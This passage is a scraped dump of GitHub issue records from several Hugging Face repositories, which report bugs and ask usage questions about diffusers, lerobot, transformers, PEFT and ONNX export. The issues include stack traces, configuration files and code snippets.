0:\n noise = randn_tensor(\n model_output.shape, dtype=model_output.dtype, device=model_output.device, generator=generator\n )\n eps = noise * s_noise\n sample = sample + eps * (sigma_hat**2 - sigma**2) ** 0.5\n\n # Compute predicted original sample (x_0) from sigma-scaled predicted noise\n # NOTE: \"original_sample\" should not be an expected prediction_type but is left in for\n # backwards compatibility\n if self.config.prediction_type == \"original_sample\" or self.config.prediction_type == \"sample\":\n pred_original_sample = model_output\n elif self.config.prediction_type == \"epsilon\":\n pred_original_sample = sample - sigma_hat * model_output\n elif self.config.prediction_type == \"v_prediction\":\n # denoised = model_output * c_out + input * c_skip\n pred_original_sample = model_output * (-sigma / (sigma**2 + 1) ** 0.5) + (sample / (sigma**2 + 1))\n else:\n raise Valu", "url": "https://github.com/huggingface/diffusers/issues/12079", "state": "open", "labels": [], "created_at": "2025-08-06T02:24:46Z", "updated_at": "2025-08-06T02:24:46Z", "comments": 0, "user": "dg845" }, { "repo": "huggingface/candle", "number": 3047, "title": "Can the safetensor files from OpenAI's new gpt-oss-20b work with any existing setup?", "body": "Is the new gpt-oss-20b a totally different architecture or can I use an existing candle setup, swap out the files and start playing around with gpt-oss-20b?\n", "url": "https://github.com/huggingface/candle/issues/3047", "state": "open", "labels": [], "created_at": "2025-08-06T01:59:59Z", "updated_at": "2025-08-06T02:01:52Z", "comments": 1, "user": "zcourts" }, { "repo": "huggingface/diffusers", "number": 12078, "title": "Problem with provided example validation input in the Flux Control finetuning example", "body": "### Describe the bug\n\nThe help page for the Flux control finetuning example, https://github.com/huggingface/diffusers/blob/main/examples/flux-control/README.md, provides a sample validation input, a pose condition image\n[]().\nThe pose conditioned model trained by the script does not process this image properly because it is in BGR format, apparent when comparing it to the openpose spec: \n[]().\nIt doesn't appear that 
the validation image is loaded in BGR format properly, in the below line:\nhttps://github.com/huggingface/diffusers/blob/ba2ba9019f76fd96c532240ed07d3f98343e4041/examples/flux-control/train_control_lora_flux.py#L127.\n\nIn my personal experiments, the validation output does not make sense. Below is an example of what my run uploaded to wandb:\n\n\"Image\"\n\n### Reproduction\n\nI ran the below in the command line: \n```\naccelerate launch --config_file=/mnt/localssd/huggingface/accelerate/deepspeed.yaml train_control_lora_flux.py \\\n --pretrained_model_name_or_path=\"black-forest-labs/FLUX.1-dev\" \\\n --dataset_name=\"raulc0399/open_pose_controlnet\" \\\n --output_dir=\"/mnt/localssd/pose-control-lora\" \\\n --mixed_precision=\"bf16\" \\\n --train_batch_size=1 \\\n --rank=64 \\\n --gradient_accumulation_steps=4 \\\n --gradient_checkpointing \\\n --use_8bit_adam \\\n --learning_rate=1e-4 \\\n --report_to=\"wandb\" \\\n --lr_scheduler=\"constant\" \\\n --lr_warmup_steps=0 \\\n --max_train_steps=5000 \\\n --validation_image=\"openpose.png\" \\\n --validation_prompt=\"A couple, 4k photo, highly detailed\" \\\n --seed=\"0\" \\\n --cache_dir=\"/mnt/localssd/huggingface\" \n```\n\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n```\n- \ud83e\udd17 Diffusers version: 0.34.0\n- Platform: Linux-5.10.223-212.873.amzn2.x86_64-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.10.8\n- PyTorch version (GPU?): 2.7.1+cu126 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.34.3\n- Transformers version: 4.54.1\n- Accelerate version: 1.9.0\n- PEFT version: 0.17.0\n- Bitsandbytes version: 0.46.1\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\n- Using GPU in script?: Yes.\n- Using distributed or parallel set-up in script?: Yes.\n```\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12078", "state": "open", "labels": [ "bug" ], "created_at": "2025-08-05T22:29:35Z", "updated_at": "2025-08-07T08:47:45Z", "comments": 1, "user": "kzhang2" }, { "repo": "huggingface/lerobot", "number": 1672, "title": "How to resume training?", "body": "My old setting of training:\n```\n# batch_size: 64\nsteps: 20000\n# output_dir: outputs/train\n```\nin outputs/train/ there are 020000 folder and last folder,eash has pretrained_model and training_state\n\n\nWhen I want to resume training, I read configs/train.py\n\nso I set\n```\nresume: true\noutput_dir: outputs/train/\n# or output_dir: outputs/train/checkpoints/last/pretrained_model/\n# or output_dir: outputs/train/checkpoints/last/pretrained_model/train_config.json\n```\nAll got this:\n\nTraceback (most recent call last):\n File \"/miniconda3/envs/lerobot/lib/python3.10/runpy.py\", line 196, in _run_module_as_main\n return _run_code(code, main_globals, None,\n File \"miniconda3/envs/lerobot/lib/python3.10/runpy.py\", line 86, in _run_code\n exec(code, run_globals)\n File \"//code/lerobot_diy/src/lerobot/scripts/train.py\", line 394, in \n train()\n File \"/code/lerobot_diy/src/lerobot/configs/parser.py\", line 225, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File 
\"/code/lerobot_diy/src/lerobot/scripts/train.py\", line 215, in train\n optimizer, lr_scheduler = make_optimizer_and_scheduler(cfg, policy)\n File \"//code/lerobot_diy/src/lerobot/optim/factory.py\", line 38, in make_optimizer_and_scheduler\n optimizer = cfg.optimizer.build(params)\nAttributeError: 'NoneType' object has no attribute 'build'\n\n\nHow to write command of output dir?\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/1672", "state": "closed", "labels": [], "created_at": "2025-08-05T14:57:32Z", "updated_at": "2025-08-06T03:04:28Z", "user": "milong26" }, { "repo": "huggingface/transformers", "number": 39921, "title": "[Gemma3N] Not able to add new special tokens to model/tokenizer due to projection error", "body": "### System Info\n\n```\n- transformers==4.54.1\n- Platform: Linux-5.15.0-1084-aws-x86_64-with-glibc2.31\n- Python version: 3.13\n- TRL version: 0.19.1\n- Huggingface_hub version: 0.33.4\n- Safetensors version: 0.5.3\n- Accelerate version: 1.9.0\n- Accelerate config: \tnot found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.7.1+cu126 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA H100 80GB HBM3\n```\n\nHi,\n\nThe transformers model class for 'gemma-3n` has issues as below (pasting stacktrace):\n\n```\n trainer.train()\n ~~~~~~~~~~~~~^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/trainer.py\", line 2237, in train\n return inner_training_loop(\n args=args,\n ...<2 lines>...\n ignore_keys_for_eval=ignore_keys_for_eval,\n )\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/trainer.py\", line 2578, in _inner_training_loop\n tr_loss_step = self.training_step(model, inputs, num_items_in_batch)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/trl/trainer/sft_trainer.py\", line 914, in training_step\n return super().training_step(*args, **kwargs)\n ~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/trainer.py\", line 3792, in training_step\n loss = self.compute_loss(model, inputs, num_items_in_batch=num_items_in_batch)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/trl/trainer/sft_trainer.py\", line 868, in compute_loss\n (loss, outputs) = super().compute_loss(\n ~~~~~~~~~~~~~~~~~~~~^\n model, inputs, return_outputs=True, num_items_in_batch=num_items_in_batch\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n )\n ^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/trainer.py\", line 3879, in compute_loss\n outputs = model(**inputs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, **kwargs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/accelerate/utils/operations.py\", line 818, in forward\n return model_forward(*args, **kwargs)\n File 
\"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/accelerate/utils/operations.py\", line 806, in __call__\n return convert_to_fp32(self.model_forward(*args, **kwargs))\n ~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/amp/autocast_mode.py\", line 44, in decorate_autocast\n return func(*args, **kwargs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/peft/peft_model.py\", line 1850, in forward\n return self.base_model(\n ~~~~~~~~~~~~~~~^\n input_ids=input_ids,\n ^^^^^^^^^^^^^^^^^^^^\n ...<6 lines>...\n **kwargs,\n ^^^^^^^^^\n )\n ^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, **kwargs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/peft/tuners/tuners_utils.py\", line 222, in forward\n return self.model.forward(*args, **kwargs)\n ~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/utils/generic.py\", line 961, in wrapper\n output = func(self, *args, **kwargs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/models/gemma3n/modeling_gemma3n.py\", line 2276, in forward\n outputs = self.model(\n input_ids=input_ids,\n ...<14 lines>...\n **lm_kwargs,\n )\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, **kwargs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13", "url": "https://github.com/huggingface/transformers/issues/39921", "state": "open", "labels": [ "Usage", "Good Second Issue", "bug" ], "created_at": "2025-08-05T14:43:37Z", "updated_at": "2025-08-19T19:37:39Z", "comments": 14, "user": "debasisdwivedy" }, { "repo": "huggingface/transformers", "number": 39910, "title": "Question: Llama4 weight reshaping", "body": "Hi all\n\nI am trying to extract the original Llama4 MoE weights, specifically:\n\n- `experts.w1` (aka `experts.moe_w_in_eD_F`)\n- `experts.w3` (aka `experts.moe_w_swiglu_eD_F`)\n\nI need both of these in the shape `[E, D, N]`, where:\n\n- E is the number of experts (16 for Scout)\n- D is the embedding dimension (5120)\n- N is the intermediate dimension (8192)\n\nI tried just splitting `experts.gate_up_proj` in half along the last dimension to get w1 and w3, but although the dimensions match, the model is outputting nonsense, so I assume the actual order of the weights is wrong.\n\nCould someone help me make sense of this snippet (from `convert_llama4_weights_to_hf`)?\nWhy is this hard coded indexing / reshaping being done and do you have any suggestions for how to get the original weight back?\n\n```python\nelif re.search(r\"(gate|up)_proj\", new_key):\n path = new_key.split(\".\")\n gate_key = re.sub(r\"(gate|up)_proj\", lambda m: \"gate_proj\", new_key)\n up_key = re.sub(r\"(gate|up)_proj\", lambda m: \"up_proj\", new_key)\n if gate_key == new_key:\n state_dict[new_key] = 
torch.cat(current_parameter, dim=concat_dim)\n elif new_key == up_key:\n if \"experts\" not in new_key:\n state_dict[new_key] = torch.cat(current_parameter, dim=concat_dim)\n else:\n # gate_proj = moe_w_in_eD_F = w1\n gate_proj = state_dict.pop(gate_key)\n gate_proj = [\n gate_proj.reshape(num_experts, -1, 8, 1024)[:, :, k, :].reshape(num_experts, -1, 1024)\n for k in range(8)\n ]\n gate_proj = torch.cat(gate_proj, dim=-1)\n\n # up_proj = moe_w_swiglu_eD_F = w3\n up_proj = [\n k.reshape(num_experts, -1, 8, 1024).reshape(num_experts, -1, 1024)\n for k in current_parameter\n ]\n up_proj = torch.cat(up_proj, dim=-1)\n\n gate_up_proj = torch.cat((gate_proj, up_proj), dim=-1)\n new_key = new_key.replace(\"up_proj\", \"gate_up_proj\")\n state_dict[new_key] = gate_up_proj.contiguous()\n\n tqdm.write(f\"Processing: {key.ljust(50)} ->\\t {new_key}, {state_dict[new_key].shape}\")\n```\n\nThank you!", "url": "https://github.com/huggingface/transformers/issues/39910", "state": "closed", "labels": [], "created_at": "2025-08-05T10:19:25Z", "updated_at": "2025-08-13T09:35:52Z", "comments": 0, "user": "gskorokhod" }, { "repo": "huggingface/datasets", "number": 7724, "title": "Can not stepinto load_dataset.py?", "body": "I set a breakpoint in \"load_dataset.py\" and try to debug my data load codes, but it does not stop at any breakpoints, so \"load_dataset.py\" can not be stepped into ?\n\n", "url": "https://github.com/huggingface/datasets/issues/7724", "state": "open", "labels": [], "created_at": "2025-08-05T09:28:51Z", "updated_at": "2025-08-05T09:28:51Z", "comments": 0, "user": "micklexqg" }, { "repo": "huggingface/lerobot", "number": 1670, "title": "How does leroBot address the issue of training heterogeneous datasets?", "body": "Specifically, suppose I have a dataset A and dataset B. In dataset A, both the state and action are represented as (x, y, z, gripper), where x, y, and z denote the distances moved along the x, y, and z axes, respectively, and gripper represents the on/off state of the gripper. In dataset B, both the state and action are the angles of the corresponding joints of the robotic arm. 
How can I use these two datasets together for training?", "url": "https://github.com/huggingface/lerobot/issues/1670", "state": "open", "labels": [ "question", "processor" ], "created_at": "2025-08-05T08:20:08Z", "updated_at": "2025-08-12T09:01:57Z", "user": "mahao18cm" }, { "repo": "huggingface/lerobot", "number": 1667, "title": "How many episodes to get a good result with SmolVLA", "body": "### System Info\n\n```Shell\nHello, I'm trying to do a simple task like a dual-hand pick of a banana into a basket using SmolVLA. May I know how many episodes I should train on to get a good result?\n\nMany thanks\nJulien\n```\n### Reproduction\n\nI've used 100 episodes for training; it looks like the arm cannot pick the banana accurately, and sometimes the arms just stay at the top of the banana\n\n### Expected behavior\n\nThe left hand picks the banana and hands it to the right hand, then the right hand puts the banana into the basket", "url": "https://github.com/huggingface/lerobot/issues/1667", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-08-05T05:12:12Z", "updated_at": "2025-10-17T11:27:14Z", "user": "chejulien" }, { "repo": "huggingface/lerobot", "number": 1666, "title": "Please add multi-GPU training support", "body": "Multi-GPU training currently does not work with lerobot, as mentioned here https://github.com/huggingface/lerobot/issues/1377\n\nPlease add this support.", "url": "https://github.com/huggingface/lerobot/issues/1666", "state": "closed", "labels": [ "enhancement", "question", "policies" ], "created_at": "2025-08-04T18:06:40Z", "updated_at": "2025-10-17T09:53:59Z", "user": "nahidalam" }, { "repo": "huggingface/lerobot", "number": 1663, "title": "No way to train on subset of features", "body": "Currently, when loading a policy from a config.json, the input_features seem to be ignored and re-generated from the dataset provided. However, it may not always be desirable to train on all features, for example if I have multiple camera views but only want to train on one.\n\nI would prefer that config.json features are not overwritten, but this would be a breaking change. Do you have suggestions on how we could implement this behavior?", "url": "https://github.com/huggingface/lerobot/issues/1663", "state": "open", "labels": [ "question", "policies", "processor" ], "created_at": "2025-08-04T15:19:35Z", "updated_at": "2025-08-12T09:03:47Z", "user": "atyshka" }, { "repo": "huggingface/diffusers", "number": 12060, "title": "Is there any DiT block defined in the huggingface/diffusers OR huggingface/transformers project?", "body": "**Is your feature request related to a problem? Please describe.**\nI want to run some experiments with a DiT-based flow-matching model and need an implementation of the common DiT block, but I did not find one in either huggingface/diffusers or huggingface/transformers. Is there an implementation of it under some other file name?\n\n**Describe the solution you'd like.**\nA clear DiT implementation\n\n**Describe alternatives you've considered.**\n\n\n**Additional context.**\n\n", "url": "https://github.com/huggingface/diffusers/issues/12060", "state": "open", "labels": [], "created_at": "2025-08-04T09:40:43Z", "updated_at": "2025-08-04T10:19:00Z", "comments": 2, "user": "JohnHerry" }, { "repo": "huggingface/diffusers", "number": 12052, "title": "Wan 2.2 with LightX2V offloading tries to multiply tensors from different devices and fails", "body": "### Describe the bug\n\nAfter @sayakpaul's great work in https://github.com/huggingface/diffusers/pull/12040, LightX2V now works. 
However, what doesn't work is adding both a LoRA and offloading to transformer_2. I can get away with either (i.e. offload both transformers but add a LoRA only to transformer and NOT to transformer_2, OR offload just transformer and add a LoRA to both transformer_2 and transformer). \n\nHowever, offloading transformer_2 is quite important: keeping it resident causes 2x the VRAM to be used, and even a Q4_K_S model with LightX2V will use >24 GB VRAM (as opposed to <9 GB VRAM as in ComfyUI).\n\n### Reproduction\n\nThe script is the same as the one posted by Paul in the #12040 PR, with the addition of offloading\n\n```python\nimport torch\nfrom diffusers import WanImageToVideoPipeline\nfrom huggingface_hub import hf_hub_download\nimport requests\nfrom PIL import Image\nfrom diffusers.loaders.lora_conversion_utils import _convert_non_diffusers_wan_lora_to_diffusers\nfrom io import BytesIO\nimport safetensors.torch\n\n# Load a basic transformer model\npipe = WanImageToVideoPipeline.from_pretrained(\n \"Wan-AI/Wan2.2-I2V-A14B-Diffusers\",\n torch_dtype=torch.bfloat16\n)\n\nlora_path = hf_hub_download(\n repo_id=\"Kijai/WanVideo_comfy\",\n filename=\"Lightx2v/lightx2v_I2V_14B_480p_cfg_step_distill_rank128_bf16.safetensors\"\n)\n\n# This is what is different: group-offload every large component\nonload_device = torch.device(\"cuda\")\noffload_device = torch.device(\"cpu\")\n\npipe.vae.enable_group_offload(onload_device=onload_device, offload_device=offload_device, offload_type=\"leaf_level\")\npipe.transformer.enable_group_offload(onload_device=onload_device, offload_device=offload_device, offload_type=\"leaf_level\")\n\n# Without this line it works but uses 2x the VRAM\npipe.transformer_2.enable_group_offload(onload_device=onload_device, offload_device=offload_device, offload_type=\"leaf_level\")\n\npipe.text_encoder.enable_group_offload(onload_device=onload_device, offload_device=offload_device, offload_type=\"leaf_level\")\n\npipe.to(\"cuda\")\n\npipe.load_lora_weights(lora_path)\n# print(pipe.transformer.__class__.__name__)\n# print(pipe.transformer.peft_config)\norg_state_dict = safetensors.torch.load_file(lora_path)\nconverted_state_dict = _convert_non_diffusers_wan_lora_to_diffusers(org_state_dict)\npipe.transformer_2.load_lora_adapter(converted_state_dict)\n\nimage_url = \"https://cloud.inference.sh/u/4mg21r6ta37mpaz6ktzwtt8krr/01k1g7k73eebnrmzmc6h0bghq6.png\"\nresponse = requests.get(image_url)\ninput_image = Image.open(BytesIO(response.content)).convert(\"RGB\")\n\nframes = pipe(input_image, \"animate\", num_inference_steps=4, guidance_scale=1.0)\n```\n\n### Logs\n\n```shell\n[t+1m44s256ms] [ERROR] Traceback (most recent call last):\n[t+1m44s256ms] File \"/server/tasks.py\", line 50, in run_task\n[t+1m44s256ms] output = await result\n[t+1m44s256ms] ^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/src/inference.py\", line 424, in run\n[t+1m44s256ms] output = self.pipe(\n[t+1m44s256ms] ^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n[t+1m44s256ms] return func(*args, **kwargs)\n[t+1m44s256ms] ^^^^^^^^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/diffusers/pipelines/wan/pipeline_wan_i2v.py\", line 754, in __call__\n[t+1m44s256ms] noise_pred = current_model(\n[t+1m44s256ms] ^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1751, in 
_wrapped_call_impl\n[t+1m44s256ms] return self._call_impl(*args, **kwargs)\n[t+1m44s256ms] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n[t+1m44s256ms] return forward_call(*args, **kwargs)\n[t+1m44s256ms] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/diffusers/hooks/hooks.py\", line 189, in new_forward\n[t+1m44s256ms] output = function_reference.forward(*args, **kwargs)\n[t+1m44s256ms] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/diffusers/models/transformers/transformer_wan.py\", line 639, in forward\n[t+1m44s256ms] temb, timestep_proj, encoder_hidden_states, encoder_hidden_states_image = self.condition_embedder(\n[t+1m44s256ms] ^^^^^^^^^^^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n[t+1m44s256ms] return self._", "url": "https://github.com/huggingface/diffusers/issues/12052", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-03T12:43:13Z", "updated_at": "2025-08-11T15:53:41Z", "comments": 4, "user": "luke14free" }, { "repo": "huggingface/peft", "number": 2699, "title": "UserWarning: Found missing adapter keys while loading the checkpoint", "body": "I have been fine-tuning different LLM models (mainly Llama family) since last year and use peft with lora config all the time with no issues. \nJust recently I was fine-tuning the llama 70B on multiple GPU using accelerate then saving the adapter once training is done. (This was always my setup since last year)\n\nHowever now I want to load the adapter into the base model as follows:\n\n```\nbase_model = AutoModelForCausalLM.from_pretrained(model_id, dtype= torch.float16, device_map = 'auto', attn_implementation = 'flash_attention_2')\n\nmodel = PeftModel.from_pretrained(base_model, adapter_path)\n```\nNow I am getting this warning:\n```\nUserWarning: Found missing adapter keys while loading the checkpoint: \n```\nThen it lists some Lora weights. I tried changing LoraConfig parameters but still the problem\nPersists.\nCan anyone please tell me what is the issue here and how to fix it.\n\nI am using the latest version of peft, transformers, accelerate,\ntrl\n\nNote: I am also using the same format for model during the training and inference.\n\nI have already looked at this and seems same issue, but I load my model using AutoModelForCasaulLM in both cases:\nhttps://github.com/huggingface/peft/issues/2566\n\n\nNote: This is the warning: `[base_model.model.model.layers.0.self_attn, q_proj.lora_A.default.weight, base_model.model.model.layers.0.self_attn, q_proj.lora_B.default.weight, base_model.model.model.layers.0.self_attn, k_proj.lora_A.default.weight, base_model.model.model.layers.0.self_attn, k_proj.lora_B.default.weight`, ...", "url": "https://github.com/huggingface/peft/issues/2699", "state": "closed", "labels": [], "created_at": "2025-08-02T20:49:31Z", "updated_at": "2025-11-09T15:03:46Z", "comments": 41, "user": "manitadayon" }, { "repo": "huggingface/diffusers", "number": 12044, "title": "AttributeError: 'bool' object has no attribute '__module__'. 
Did you mean: '__mod__'?", "body": "I am train the Flux.1-dev model and get this error. I found the solution to bring diffuser to version 0.21.0 but then it would beconflict with some other libraries. Is there any solution for this?\n\n```\nTraceback (most recent call last):\n File \"/home/quyetnv/t2i/ai-toolkit/run.py\", line 120, in \n main()\n File \"/home/quyetnv/t2i/ai-toolkit/run.py\", line 108, in main\n raise e\n File \"/home/quyetnv/t2i/ai-toolkit/run.py\", line 96, in main\n job.run()\n File \"/home/quyetnv/t2i/ai-toolkit/jobs/ExtensionJob.py\", line 22, in run\n process.run()\n File \"/home/quyetnv/t2i/ai-toolkit/jobs/process/BaseSDTrainProcess.py\", line 1518, in run\n self.sd.load_model()\n File \"/home/quyetnv/t2i/ai-toolkit/toolkit/stable_diffusion_model.py\", line 788, in load_model\n pipe: Pipe = Pipe(\n File \"/home/quyetnv/.venv/lib/python3.10/site-packages/diffusers/pipelines/flux/pipeline_flux.py\", line 197, in __init__\n self.register_modules(\n File \"/home/quyetnv/.venv/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 212, in register_modules\n library, class_name = _fetch_class_library_tuple(module)\n File \"/home/quyetnv/.venv/lib/python3.10/site-packages/diffusers/pipelines/pipeline_loading_utils.py\", line 877, in _fetch_class_library_tuple\n library = not_compiled_module.__module__.split(\".\")[0]\nAttributeError: 'bool' object has no attribute '__module__'. Did you mean: '__mod__'?\n``` \nmy version diffusers was installed from requirement of ai-toolkit is 0.35.0 dev3", "url": "https://github.com/huggingface/diffusers/issues/12044", "state": "closed", "labels": [], "created_at": "2025-08-02T01:37:30Z", "updated_at": "2025-08-21T01:27:19Z", "comments": 3, "user": "qngv" }, { "repo": "huggingface/optimum", "number": 2333, "title": "Support for exporting t5gemma-2b-2b-prefixlm-it to onnx", "body": "### Feature request\n\nI\u2019ve tried to export t5gemma-2b-2b-prefixlm-it to onnx using optimum. But it outputs: ValueError: Trying to export a t5gemma model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. 
Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type t5gemma to be supported natively in the ONNX export.\n\nTask: \"text2text-generation\"\n\n### Motivation\n\nI\u2019ve tried, but nothing works...\n\n### Your contribution\n\nconfig.json\n\n{\n \"architectures\": [\n \"T5GemmaForConditionalGeneration\"\n ],\n \"classifier_dropout_rate\": 0.0,\n \"decoder\": {\n \"attention_bias\": false,\n \"attention_dropout\": 0.0,\n \"attn_logit_softcapping\": 50.0,\n \"classifier_dropout_rate\": 0.0,\n \"cross_attention_hidden_size\": 2304,\n \"dropout_rate\": 0.0,\n \"final_logit_softcapping\": 30.0,\n \"head_dim\": 256,\n \"hidden_activation\": \"gelu_pytorch_tanh\",\n \"hidden_size\": 2304,\n \"initializer_range\": 0.02,\n \"intermediate_size\": 9216,\n \"is_decoder\": true,\n \"layer_types\": [\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\"\n ],\n \"max_position_embeddings\": 8192,\n \"model_type\": \"t5_gemma_module\",\n \"num_attention_heads\": 8,\n \"num_hidden_layers\": 26,\n \"num_key_value_heads\": 4,\n \"query_pre_attn_scalar\": 256,\n \"rms_norm_eps\": 1e-06,\n \"rope_theta\": 10000.0,\n \"sliding_window\": 4096,\n \"torch_dtype\": \"bfloat16\",\n \"use_cache\": true,\n \"vocab_size\": 256000\n },\n \"dropout_rate\": 0.0,\n \"encoder\": {\n \"attention_bias\": false,\n \"attention_dropout\": 0.0,\n \"attn_logit_softcapping\": 50.0,\n \"classifier_dropout_rate\": 0.0,\n \"dropout_rate\": 0.0,\n \"final_logit_softcapping\": 30.0,\n \"head_dim\": 256,\n \"hidden_activation\": \"gelu_pytorch_tanh\",\n \"hidden_size\": 2304,\n \"initializer_range\": 0.02,\n \"intermediate_size\": 9216,\n \"layer_types\": [\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\"\n ],\n \"max_position_embeddings\": 8192,\n \"model_type\": \"t5_gemma_module\",\n \"num_attention_heads\": 8,\n \"num_hidden_layers\": 26,\n \"num_key_value_heads\": 4,\n \"query_pre_attn_scalar\": 256,\n \"rms_norm_eps\": 1e-06,\n \"rope_theta\": 10000.0,\n \"sliding_window\": 4096,\n \"torch_dtype\": \"bfloat16\",\n \"use_cache\": true,\n \"vocab_size\": 256000\n },\n \"eos_token_id\": [\n 1,\n 107\n ],\n \"initializer_range\": 0.02,\n \"is_encoder_decoder\": true,\n \"model_type\": \"t5gemma\",\n \"pad_token_id\": 0,\n \"torch_dtype\": \"bfloat16\",\n \"transformers_version\": \"4.53.0.dev0\",\n \"use_cache\": true\n}", "url": "https://github.com/huggingface/optimum/issues/2333", "state": 
